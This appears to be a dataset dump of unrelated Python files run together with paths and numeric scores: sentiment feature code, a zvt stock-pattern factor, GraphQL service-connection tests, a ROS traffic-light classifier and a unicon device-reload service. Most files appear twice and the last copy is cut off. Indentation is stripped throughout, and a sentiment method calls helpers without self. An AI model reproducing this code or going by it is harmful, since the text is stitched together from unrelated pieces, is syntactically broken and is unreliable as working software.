self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiMean"] = self.df['posNegObjSenti'].apply(lambda ind:ind.mean(axis=0) )
self.df['objSentiMean'] = self.df["posNegObjSentiMean"].apply(lambda ind:ind[2] )
return self
def getPNSentiGap(self):
if not 'tags' in self.df.columns:
self.getTags()
if not 'posNegObjSenti' in self.df.columns and not 'posNegObjSentiSum' in self.df.columns:
self.df['posNegObjSenti'] = self.df['tagsNameChange'].apply(lambda tagSeq: np.apply_along_axis(sentimentFeatures,1,tagSeq) )
self.df["posNegObjSentiSum"] = self.df['posNegObjSenti'].apply(lambda ind:ind.sum(axis=0) )
if not 'posSentiSum' in self.df.columns:
getPSentiSum()
if not 'negSentiSum' in self.df.columns:
getNSentiSum()
self.df['posNegGap'] = self.df["posSentiSum"] + self.df["negSentiSum"]
return self
def getSentiment(self):
return self.getPSentiSum().getNSentiSum().getObjSentiSum().getPSentiMean().getNSentiMean().getObjSentiMean().getPNSentiGap()
## Synsets
def getSynsets(self):
self.df[["synsetMean","synsetMax","synsetGap"]] = pd.DataFrame(self.df["textSeq"].apply(getSynsetsMeanMaxGap).tolist(),index = self.df.index)
return self
def getAllFeatures(self):
return self.getStructure().getFreq().getWrittenSpoken().getSyno().getSynsets().getSentiment().df | 0.458591 | 0.171616 |
import argparse
from typing import List, Union
import pandas as pd
from zvt.contract import IntervalLevel
from zvt.utils.pd_utils import pd_is_not_null
from zvt.utils.time_utils import now_pd_timestamp
from zvt.api import get_entities, Stock
from zvt.api.quote import get_zen_factor_schema
from zvt.factors.factor import Accumulator, Transformer
from zvt.factors.technical_factor import TechnicalFactor
def is_including(s1: pd.Series, s2: pd.Series):
if (s1['high'] >= s2['high']) and (s1['low'] <= s2['low']):
return True
if (s1['high'] <= s2['high']) and (s1['low'] >= s2['low']):
return True
return False
def get_current_state(s1: pd.Series, s2: pd.Series, pre_state=0):
# 上涨
if (s1['high'] > s2['high']) and (s1['low'] > s2['low']):
return 1
# 下跌
if (s1['high'] < s2['high']) and (s1['low'] < s2['low']):
return -1
# 震荡(包含关系)
return pre_state
class ZenAccumulator(Accumulator):
def acc(self, input_df, acc_df) -> pd.DataFrame:
if pd_is_not_null(acc_df):
input_df = input_df[~input_df['id'].isin(acc_df['id'])]
input_df = input_df.copy()
for entity_id, df in input_df.groupby(level=0):
pre_index = None
pre_item = None
current_state = 0
pre_state = 0
for index, item in df.iterrows():
if pre_item is not None:
current_state = get_current_state(item, pre_item, current_state)
input_df.loc[index, 'tmp_bi_state'] = current_state
if (current_state != 0 and pre_state != 0) and current_state != pre_state:
# -1 -> 1
if current_state == 1:
input_df.loc[pre_index, 'tmp_di'] = True
# 1 -> -1
if current_state == -1:
input_df.loc[pre_index, 'tmp_ding'] = True
pre_index = index
pre_item = item
pre_state = current_state
print(input_df)
self.logger.info('finish calculating :{}'.format(entity_id))
if pd_is_not_null(acc_df):
if pd_is_not_null(input_df):
df = input_df[set(acc_df.columns) & set(input_df.columns)]
acc_df = acc_df.append(df)
acc_df = acc_df.sort_index(level=[0, 1])
else:
acc_df = input_df
return acc_df
class ZenFactor(TechnicalFactor):
def __init__(self, entity_ids: List[str] = None, entity_type: str = 'stock', exchanges: List[str] = ['sh', 'sz'],
codes: List[str] = None, the_timestamp: Union[str, pd.Timestamp] = None,
start_timestamp: Union[str, pd.Timestamp] = None, end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = None, filters: List = None, order: object = None, limit: int = None,
provider: str = 'joinquant', level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = 'entity_id', time_field: str = 'timestamp', computing_window: int = None,
keep_all_timestamp: bool = False, fill_method: str = 'ffill', effective_number: int = 10,
need_persist: bool = False, dry_run: bool = True) -> None:
self.factor_schema = get_zen_factor_schema(entity_type=entity_type, level=level)
transformer: Transformer = None
acc = ZenAccumulator()
super().__init__(entity_ids, entity_type, exchanges, codes, the_timestamp, start_timestamp,
end_timestamp, columns, filters, order, limit, provider, level, category_field, time_field,
computing_window, keep_all_timestamp, fill_method, effective_number, transformer, acc,
need_persist, dry_run)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--level', help='trading level', default='1d',
choices=[item.value for item in IntervalLevel])
parser.add_argument('--start', help='start code', default='000001')
parser.add_argument('--end', help='end code', default='000005')
args = parser.parse_args()
level = IntervalLevel(args.level)
start = args.start
end = args.end
entities = get_entities(provider='eastmoney', entity_type='stock', columns=[Stock.entity_id, Stock.code],
filters=[Stock.code >= start, Stock.code < end])
codes = entities.index.to_list()
factor = ZenFactor(codes=codes, start_timestamp='2005-01-01',
end_timestamp=now_pd_timestamp(),
level=level) | zvt/factors/zen/zen_factor.py | import argparse
from typing import List, Union
import pandas as pd
from zvt.contract import IntervalLevel
from zvt.utils.pd_utils import pd_is_not_null
from zvt.utils.time_utils import now_pd_timestamp
from zvt.api import get_entities, Stock
from zvt.api.quote import get_zen_factor_schema
from zvt.factors.factor import Accumulator, Transformer
from zvt.factors.technical_factor import TechnicalFactor
def is_including(s1: pd.Series, s2: pd.Series):
if (s1['high'] >= s2['high']) and (s1['low'] <= s2['low']):
return True
if (s1['high'] <= s2['high']) and (s1['low'] >= s2['low']):
return True
return False
def get_current_state(s1: pd.Series, s2: pd.Series, pre_state=0):
# 上涨
if (s1['high'] > s2['high']) and (s1['low'] > s2['low']):
return 1
# 下跌
if (s1['high'] < s2['high']) and (s1['low'] < s2['low']):
return -1
# 震荡(包含关系)
return pre_state
class ZenAccumulator(Accumulator):
def acc(self, input_df, acc_df) -> pd.DataFrame:
if pd_is_not_null(acc_df):
input_df = input_df[~input_df['id'].isin(acc_df['id'])]
input_df = input_df.copy()
for entity_id, df in input_df.groupby(level=0):
pre_index = None
pre_item = None
current_state = 0
pre_state = 0
for index, item in df.iterrows():
if pre_item is not None:
current_state = get_current_state(item, pre_item, current_state)
input_df.loc[index, 'tmp_bi_state'] = current_state
if (current_state != 0 and pre_state != 0) and current_state != pre_state:
# -1 -> 1
if current_state == 1:
input_df.loc[pre_index, 'tmp_di'] = True
# 1 -> -1
if current_state == -1:
input_df.loc[pre_index, 'tmp_ding'] = True
pre_index = index
pre_item = item
pre_state = current_state
print(input_df)
self.logger.info('finish calculating :{}'.format(entity_id))
if pd_is_not_null(acc_df):
if pd_is_not_null(input_df):
df = input_df[set(acc_df.columns) & set(input_df.columns)]
acc_df = acc_df.append(df)
acc_df = acc_df.sort_index(level=[0, 1])
else:
acc_df = input_df
return acc_df
class ZenFactor(TechnicalFactor):
def __init__(self, entity_ids: List[str] = None, entity_type: str = 'stock', exchanges: List[str] = ['sh', 'sz'],
codes: List[str] = None, the_timestamp: Union[str, pd.Timestamp] = None,
start_timestamp: Union[str, pd.Timestamp] = None, end_timestamp: Union[str, pd.Timestamp] = None,
columns: List = None, filters: List = None, order: object = None, limit: int = None,
provider: str = 'joinquant', level: Union[str, IntervalLevel] = IntervalLevel.LEVEL_1DAY,
category_field: str = 'entity_id', time_field: str = 'timestamp', computing_window: int = None,
keep_all_timestamp: bool = False, fill_method: str = 'ffill', effective_number: int = 10,
need_persist: bool = False, dry_run: bool = True) -> None:
self.factor_schema = get_zen_factor_schema(entity_type=entity_type, level=level)
transformer: Transformer = None
acc = ZenAccumulator()
super().__init__(entity_ids, entity_type, exchanges, codes, the_timestamp, start_timestamp,
end_timestamp, columns, filters, order, limit, provider, level, category_field, time_field,
computing_window, keep_all_timestamp, fill_method, effective_number, transformer, acc,
need_persist, dry_run)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--level', help='trading level', default='1d',
choices=[item.value for item in IntervalLevel])
parser.add_argument('--start', help='start code', default='000001')
parser.add_argument('--end', help='end code', default='000005')
args = parser.parse_args()
level = IntervalLevel(args.level)
start = args.start
end = args.end
entities = get_entities(provider='eastmoney', entity_type='stock', columns=[Stock.entity_id, Stock.code],
filters=[Stock.code >= start, Stock.code < end])
codes = entities.index.to_list()
factor = ZenFactor(codes=codes, start_timestamp='2005-01-01',
end_timestamp=now_pd_timestamp(),
level=level) | 0.506347 | 0.296215 |
import pytest
from open_city_profile.consts import (
SERVICE_CONNECTION_ALREADY_EXISTS_ERROR,
SERVICE_NOT_IDENTIFIED_ERROR,
)
from open_city_profile.tests.asserts import assert_match_error_code
from services.enums import ServiceType
from services.tests.factories import ProfileFactory, ServiceConnectionFactory
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_query_own_services(
user_gql_client, service, allowed_data_field_factory
):
profile = ProfileFactory(user=user_gql_client.user)
first_field = allowed_data_field_factory()
second_field = allowed_data_field_factory()
allowed_data_field_factory()
service.allowed_data_fields.add(first_field)
service.allowed_data_fields.add(second_field)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
title
description
allowedDataFields {
edges {
node {
fieldName
label
}
}
}
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"title": service.title,
"description": service.description,
"allowedDataFields": {
"edges": [
{
"node": {
"fieldName": first_field.field_name,
"label": first_field.label,
}
},
{
"node": {
"fieldName": second_field.field_name,
"label": second_field.label,
}
},
]
},
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_add_service(user_gql_client, service):
ProfileFactory(user=user_gql_client.user)
# service object with type is included in query just to ensure that it has NO affect
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
service: {
type: GODCHILDREN_OF_CULTURE
}
enabled: false
}
}) {
serviceConnection {
service {
type
name
}
enabled
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name},
"enabled": False,
}
}
}
executed = user_gql_client.execute(query, service=service)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_cannot_add_service_multiple_times_mutation(
user_gql_client, service
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name}
}
}
}
executed = user_gql_client.execute(query, service=service)
assert dict(executed["data"]) == expected_data
assert "errors" not in executed
# do the mutation again
executed = user_gql_client.execute(query, service=service)
assert "errors" in executed
assert "code" in executed["errors"][0]["extensions"]
assert (
executed["errors"][0]["extensions"]["code"]
== SERVICE_CONNECTION_ALREADY_EXISTS_ERROR
)
def test_not_identifying_service_for_add_service_connection_produces_service_not_identified_error(
user_gql_client,
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
executed = user_gql_client.execute(query, service=None)
assert_match_error_code(executed, SERVICE_NOT_IDENTIFIED_ERROR)
def test_normal_user_can_query_own_services_gdpr_api_scopes(
user_gql_client, service_factory,
):
query_scope = "query_scope"
delete_scope = "delete_scope"
service = service_factory(
service_type=ServiceType.BERTH,
gdpr_query_scope=query_scope,
gdpr_delete_scope=delete_scope,
)
profile = ProfileFactory(user=user_gql_client.user)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
gdprQueryScope
gdprDeleteScope
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"gdprQueryScope": query_scope,
"gdprDeleteScope": delete_scope,
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
assert dict(executed["data"]) == expected_data | services/tests/test_services_graphql_api.py | import pytest
from open_city_profile.consts import (
SERVICE_CONNECTION_ALREADY_EXISTS_ERROR,
SERVICE_NOT_IDENTIFIED_ERROR,
)
from open_city_profile.tests.asserts import assert_match_error_code
from services.enums import ServiceType
from services.tests.factories import ProfileFactory, ServiceConnectionFactory
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_query_own_services(
user_gql_client, service, allowed_data_field_factory
):
profile = ProfileFactory(user=user_gql_client.user)
first_field = allowed_data_field_factory()
second_field = allowed_data_field_factory()
allowed_data_field_factory()
service.allowed_data_fields.add(first_field)
service.allowed_data_fields.add(second_field)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
title
description
allowedDataFields {
edges {
node {
fieldName
label
}
}
}
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"title": service.title,
"description": service.description,
"allowedDataFields": {
"edges": [
{
"node": {
"fieldName": first_field.field_name,
"label": first_field.label,
}
},
{
"node": {
"fieldName": second_field.field_name,
"label": second_field.label,
}
},
]
},
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_can_add_service(user_gql_client, service):
ProfileFactory(user=user_gql_client.user)
# service object with type is included in query just to ensure that it has NO affect
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
service: {
type: GODCHILDREN_OF_CULTURE
}
enabled: false
}
}) {
serviceConnection {
service {
type
name
}
enabled
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name},
"enabled": False,
}
}
}
executed = user_gql_client.execute(query, service=service)
assert executed["data"] == expected_data
@pytest.mark.parametrize("service__service_type", [ServiceType.BERTH])
def test_normal_user_cannot_add_service_multiple_times_mutation(
user_gql_client, service
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
expected_data = {
"addServiceConnection": {
"serviceConnection": {
"service": {"type": service.service_type.name, "name": service.name}
}
}
}
executed = user_gql_client.execute(query, service=service)
assert dict(executed["data"]) == expected_data
assert "errors" not in executed
# do the mutation again
executed = user_gql_client.execute(query, service=service)
assert "errors" in executed
assert "code" in executed["errors"][0]["extensions"]
assert (
executed["errors"][0]["extensions"]["code"]
== SERVICE_CONNECTION_ALREADY_EXISTS_ERROR
)
def test_not_identifying_service_for_add_service_connection_produces_service_not_identified_error(
user_gql_client,
):
ProfileFactory(user=user_gql_client.user)
query = """
mutation {
addServiceConnection(input: {
serviceConnection: {
}
}) {
serviceConnection {
service {
type
name
}
}
}
}
"""
executed = user_gql_client.execute(query, service=None)
assert_match_error_code(executed, SERVICE_NOT_IDENTIFIED_ERROR)
def test_normal_user_can_query_own_services_gdpr_api_scopes(
user_gql_client, service_factory,
):
query_scope = "query_scope"
delete_scope = "delete_scope"
service = service_factory(
service_type=ServiceType.BERTH,
gdpr_query_scope=query_scope,
gdpr_delete_scope=delete_scope,
)
profile = ProfileFactory(user=user_gql_client.user)
ServiceConnectionFactory(profile=profile, service=service)
query = """
{
myProfile {
serviceConnections {
edges {
node {
service {
type
name
gdprQueryScope
gdprDeleteScope
}
}
}
}
}
}
"""
expected_data = {
"myProfile": {
"serviceConnections": {
"edges": [
{
"node": {
"service": {
"type": service.service_type.name,
"name": service.name,
"gdprQueryScope": query_scope,
"gdprDeleteScope": delete_scope,
}
}
}
]
}
}
}
executed = user_gql_client.execute(query)
assert dict(executed["data"]) == expected_data | 0.582372 | 0.363534 |
import os
import rospy
import rospkg
import tensorflow as tf
import numpy as np
import cv2
from PIL import Image, ImageFont, ImageDraw
from abc import ABCMeta, abstractmethod
from styx_msgs.msg import TrafficLight
from light_classification.tl_classifier import TLClassifier
class SSDTLClassifier(TLClassifier):
__metaclass__ = ABCMeta
@staticmethod
def get_state_count_threshold(last_state):
if last_state == TrafficLight.RED:
# High threshold for accelerating
return 3
# Low threshold for stopping
return 1
@staticmethod
def _convert_box_coords(boxes, height, width):
"""
Converts bounding boxes from normalized
coordinates (0 to 1), to image coordinates
"""
box_coords = np.zeros_like(boxes)
box_coords[:, 0] = boxes[:, 0] * height
box_coords[:, 1] = boxes[:, 1] * width
box_coords[:, 2] = boxes[:, 2] * height
box_coords[:, 3] = boxes[:, 3] * width
return box_coords
@staticmethod
def _load_graph(graph_file):
"""Loads a frozen inference graph"""
graph = tf.Graph()
with graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(graph_file, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return graph
def _filter_boxes(self, boxes, scores, classes):
"""
Filters boxes with scores less than
confidence threshold
"""
n = len(classes)
idxs = []
for i in range(n):
if scores[i] >= self.confidence:
idxs.append(i)
boxes = boxes[idxs, ...]
scores = scores[idxs, ...]
classes = classes[idxs, ...]
return boxes, scores, classes
def _get_debug_image(self, image, boxes, scores, classes):
"""Draws detected bounding boxes"""
if classes.size == 0:
return image
pil_image = Image.fromarray(image)
width, height = pil_image.size
box_coords = self._convert_box_coords(boxes, height, width)
font = ImageFont.truetype(font=os.path.join(self.package_root_path,'config/FiraMono-Medium.otf'),
size=np.floor(3e-2 * pil_image.size[1] + 0.5).astype('int32'))
thickness = (pil_image.size[0] + pil_image.size[1]) // 300
draw = ImageDraw.Draw(pil_image)
for i, c in enumerate(classes):
score = scores[i]
predicted_class = self.labels_dict[c]
box = box_coords[i]
label = '{} {:.2f}'.format(predicted_class, score)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(pil_image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(pil_image.size[0], np.floor(right + 0.5).astype('int32'))
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for j in range(thickness):
draw.rectangle([left + j, top + j, right - j, bottom - j], outline=self.labels_dict[c])
draw.rectangle([tuple(text_origin), tuple(text_origin + label_size)], fill=self.labels_dict[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
return np.asarray(pil_image)
def _classify(self, image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_resized = cv2.resize(image, (300, 300))
image_np = np.expand_dims(np.asarray(image_resized, dtype=np.uint8), 0)
# Actual detection
(boxes, scores, classes) = self.sess.run([self.detection_boxes, self.detection_scores,
self.detection_classes], feed_dict={self.image_tensor: image_np})
# Remove unnecessary dimensions
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes)
boxes, scores, classes = self._filter_boxes(boxes, scores, classes)
for i, c in enumerate(classes):
rospy.logdebug('class = %s, score = %s', self.labels_dict[c], str(scores[i]))
if classes.size == 0:
traffic_light = TrafficLight.UNKNOWN
else:
i = np.argmax(scores)
if classes[i] == 2:
traffic_light = TrafficLight.RED
elif classes[i] == 3:
traffic_light = TrafficLight.YELLOW
elif classes[i] == 1:
traffic_light = TrafficLight.GREEN
else:
traffic_light = TrafficLight.UNKNOWN
if self.is_debug:
# create a debug image with bounding boxes and labels
debug_image = self._get_debug_image(image, boxes, scores, classes)
return traffic_light, debug_image
return traffic_light, None
@abstractmethod
def __init__(self, is_debug, model_path, confidence):
super(SSDTLClassifier, self).__init__(self.__class__.__name__, is_debug)
# Model path
self.package_root_path = rospkg.RosPack().get_path('tl_detector')
model_path = os.path.join(self.package_root_path, model_path)
# Set confidence
self.confidence = confidence
# Labels dictionary
self.labels_dict = {1: 'Green', 2: 'Red', 3: 'Yellow', 4: 'Unknown'}
# Load frozen graph of trained model
self.detection_graph = self._load_graph(model_path)
# Get tensors
self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
# Create session
self.sess = tf.Session(graph=self.detection_graph)
@TLClassifier.register_subclass('ssd-sim')
class SSDSimTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
super(SSDSimTLClassifier, self).__init__(is_debug, 'models/ssd-sim.pb', 0.8)
@TLClassifier.register_subclass('ssd-real')
class SSDRealTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
super(SSDRealTLClassifier, self).__init__(is_debug, 'models/ssd-real.pb', 0.5) | ros/src/tl_detector/light_classification/ssd_tl_classifier.py | import os
import rospy
import rospkg
import tensorflow as tf
import numpy as np
import cv2
from PIL import Image, ImageFont, ImageDraw
from abc import ABCMeta, abstractmethod
from styx_msgs.msg import TrafficLight
from light_classification.tl_classifier import TLClassifier
class SSDTLClassifier(TLClassifier):
__metaclass__ = ABCMeta
@staticmethod
def get_state_count_threshold(last_state):
if last_state == TrafficLight.RED:
# High threshold for accelerating
return 3
# Low threshold for stopping
return 1
@staticmethod
def _convert_box_coords(boxes, height, width):
"""
Converts bounding boxes from normalized
coordinates (0 to 1), to image coordinates
"""
box_coords = np.zeros_like(boxes)
box_coords[:, 0] = boxes[:, 0] * height
box_coords[:, 1] = boxes[:, 1] * width
box_coords[:, 2] = boxes[:, 2] * height
box_coords[:, 3] = boxes[:, 3] * width
return box_coords
@staticmethod
def _load_graph(graph_file):
"""Loads a frozen inference graph"""
graph = tf.Graph()
with graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(graph_file, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return graph
def _filter_boxes(self, boxes, scores, classes):
"""
Filters boxes with scores less than
confidence threshold
"""
n = len(classes)
idxs = []
for i in range(n):
if scores[i] >= self.confidence:
idxs.append(i)
boxes = boxes[idxs, ...]
scores = scores[idxs, ...]
classes = classes[idxs, ...]
return boxes, scores, classes
def _get_debug_image(self, image, boxes, scores, classes):
"""Draws detected bounding boxes"""
if classes.size == 0:
return image
pil_image = Image.fromarray(image)
width, height = pil_image.size
box_coords = self._convert_box_coords(boxes, height, width)
font = ImageFont.truetype(font=os.path.join(self.package_root_path,'config/FiraMono-Medium.otf'),
size=np.floor(3e-2 * pil_image.size[1] + 0.5).astype('int32'))
thickness = (pil_image.size[0] + pil_image.size[1]) // 300
draw = ImageDraw.Draw(pil_image)
for i, c in enumerate(classes):
score = scores[i]
predicted_class = self.labels_dict[c]
box = box_coords[i]
label = '{} {:.2f}'.format(predicted_class, score)
label_size = draw.textsize(label, font)
top, left, bottom, right = box
top = max(0, np.floor(top + 0.5).astype('int32'))
left = max(0, np.floor(left + 0.5).astype('int32'))
bottom = min(pil_image.size[1], np.floor(bottom + 0.5).astype('int32'))
right = min(pil_image.size[0], np.floor(right + 0.5).astype('int32'))
if top - label_size[1] >= 0:
text_origin = np.array([left, top - label_size[1]])
else:
text_origin = np.array([left, top + 1])
for j in range(thickness):
draw.rectangle([left + j, top + j, right - j, bottom - j], outline=self.labels_dict[c])
draw.rectangle([tuple(text_origin), tuple(text_origin + label_size)], fill=self.labels_dict[c])
draw.text(text_origin, label, fill=(0, 0, 0), font=font)
return np.asarray(pil_image)
def _classify(self, image):
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image_resized = cv2.resize(image, (300, 300))
image_np = np.expand_dims(np.asarray(image_resized, dtype=np.uint8), 0)
# Actual detection
(boxes, scores, classes) = self.sess.run([self.detection_boxes, self.detection_scores,
self.detection_classes], feed_dict={self.image_tensor: image_np})
# Remove unnecessary dimensions
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes)
boxes, scores, classes = self._filter_boxes(boxes, scores, classes)
for i, c in enumerate(classes):
rospy.logdebug('class = %s, score = %s', self.labels_dict[c], str(scores[i]))
if classes.size == 0:
traffic_light = TrafficLight.UNKNOWN
else:
i = np.argmax(scores)
if classes[i] == 2:
traffic_light = TrafficLight.RED
elif classes[i] == 3:
traffic_light = TrafficLight.YELLOW
elif classes[i] == 1:
traffic_light = TrafficLight.GREEN
else:
traffic_light = TrafficLight.UNKNOWN
if self.is_debug:
# create a debug image with bounding boxes and labels
debug_image = self._get_debug_image(image, boxes, scores, classes)
return traffic_light, debug_image
return traffic_light, None
@abstractmethod
def __init__(self, is_debug, model_path, confidence):
super(SSDTLClassifier, self).__init__(self.__class__.__name__, is_debug)
# Model path
self.package_root_path = rospkg.RosPack().get_path('tl_detector')
model_path = os.path.join(self.package_root_path, model_path)
# Set confidence
self.confidence = confidence
# Labels dictionary
self.labels_dict = {1: 'Green', 2: 'Red', 3: 'Yellow', 4: 'Unknown'}
# Load frozen graph of trained model
self.detection_graph = self._load_graph(model_path)
# Get tensors
self.image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
self.detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
self.detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
# Create session
self.sess = tf.Session(graph=self.detection_graph)
@TLClassifier.register_subclass('ssd-sim')
class SSDSimTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
super(SSDSimTLClassifier, self).__init__(is_debug, 'models/ssd-sim.pb', 0.8)
@TLClassifier.register_subclass('ssd-real')
class SSDRealTLClassifier(SSDTLClassifier):
def __init__(self, is_debug):
super(SSDRealTLClassifier, self).__init__(is_debug, 'models/ssd-real.pb', 0.5) | 0.731059 | 0.362264 |
__author__ = "<NAME> <<EMAIL>>"
import re
import collections
from time import sleep
from unicon.bases.routers.services import BaseService
from unicon.core.errors import SubCommandFailure, StateMachineError
from unicon.eal.dialogs import Dialog, Statement
from unicon.plugins.generic.statements import GenericStatements, \
authentication_statement_list
from unicon.plugins.confd.patterns import ConfdPatterns
from unicon.plugins.generic import GenericUtils
from .service_statements import reload_statement_list, \
reload_continue_statement_list
utils = GenericUtils()
statements = GenericStatements()
class Reload(BaseService):
"""Service to reload the device.
Arguments:
reload_command: reload command to be issued. default is
"system reload" on config mode.
dialog: Dialog which include list of Statements for
additional dialogs prompted by reload command, in-case
it is not in the current list.
timeout: Timeout value in sec, Default value is {} sec
Returns:
Console log output of connected via serial console,
if connected via SSH returns connect log
raises SubCommandFailure on failure
Example ::
.. code-block:: python
csp.reload()
"""
def __init__(self, connection, context, **kwargs):
super().__init__(connection, context, **kwargs)
self.start_state = 'cisco_exec'
self.end_state = 'cisco_exec'
self.service_name = 'reload'
self.timeout = connection.settings.RELOAD_TIMEOUT
self.__doc__ = self.__doc__.format(connection.settings.RELOAD_TIMEOUT)
def call_service(self,
reload_command='system reboot',
dialog=Dialog([]),
timeout=None,
*args, **kwargs):
con = self.connection
timeout = timeout or self.timeout
fmt_msg = "+++ reloading %s " \
" with reload_command '%s' " \
"and timeout %s +++"
con.log.info(fmt_msg % (self.connection.hostname,
reload_command,
timeout))
if not isinstance(dialog, Dialog):
raise SubCommandFailure(
"dialog passed must be an instance of Dialog")
if self.context.get('console'):
dialog = self.service_dialog(service_dialog=dialog)
dialog += Dialog(authentication_statement_list)
dialog += Dialog(reload_continue_statement_list)
con.spawn.sendline(reload_command)
try:
self.result = dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
except Exception as err:
raise SubCommandFailure("Reload failed %s" % err)
if self.result:
self.result = utils.remove_ansi_escape_codes(self.result.match_output)
else:
con.log.warning('Did not detect a console session, will try to reconnect...')
dialog = Dialog(reload_statement_list)
con.spawn.sendline(reload_command)
dialog.process(con.spawn,
timeout=timeout,
prompt_recovery=self.prompt_recovery,
context=self.context)
con.expect('.+')
con.log.warning('Disconnecting...')
con.disconnect()
for x in range(3):
con.log.warning('Waiting for {} seconds'.format(con.settings.RELOAD_WAIT))
sleep(con.settings.RELOAD_WAIT)
con.log.warning('Trying to connect... attempt #{}'.format(x+1))
try:
output = con.connect()
self.result = output
except:
con.log.warning('Connection failed')
if con.connected:
break
if not con.connected:
raise SubCommandFailure('Reload failed - could not reconnect') | src/unicon/plugins/confd/csp/service_implementation.py |
__author__ = "<NAME> <<EMAIL>>"
import re
import collections
from time import sleep
from unicon.bases.routers.services import BaseService
from unicon.core.errors import SubCommandFailure, StateMachineError
from unicon.eal.dialogs import Dialog, Statement
from unicon.plugins.generic.statements import GenericStatements, \
authentication_statement_list
from unicon.plugins.confd.patterns import ConfdPatterns
from unicon.plugins.generic import GenericUtils
from .service_statements import reload_statement_list, \
reload_continue_statement_list
utils = GenericUtils()
statements = GenericStatements()
class Reload(BaseService):
"""Service to reload the device.
Arguments:
reload_command: reload command to be issued. default is
"system reload" on config mode.
dialog: Dialog which include list of Statements for
additional dialogs prompted by reload command, in-case
it is not in the current list.
timeout: Timeout value in sec, Default value is {} sec
Returns:
Console log output of connected via serial console,
if connected via SSH returns connect log
raises SubCommandFailure on failure
Example ::
.. code-block:: python
csp.reload()
"""
def __init__(self, connection, context, **kwargs):
super().__init__(connection, context, **kwargs)
self.start_state = 'cisco_exec'
self.end_state = 'cisco_exec'
self.service_name = 'reload'
self.timeout = connection.settings.RELOAD_TIMEOUT
self.__doc__ = self.__doc__.format(connection.settings.RELOAD_TIMEOUT)
def call_service(self,
reload_command='system reboot',
dialog=Dialog([]),
timeout=None,
*args, **kwargs):
con = self.connection
timeout = timeout or self.timeout
fmt_msg = "+++ reloading %s " \
" with reload_command '%s' " \
"and timeout %s +++"
con.log.info(fmt_msg % (self.connection.hostname,
reload_command,
timeout))
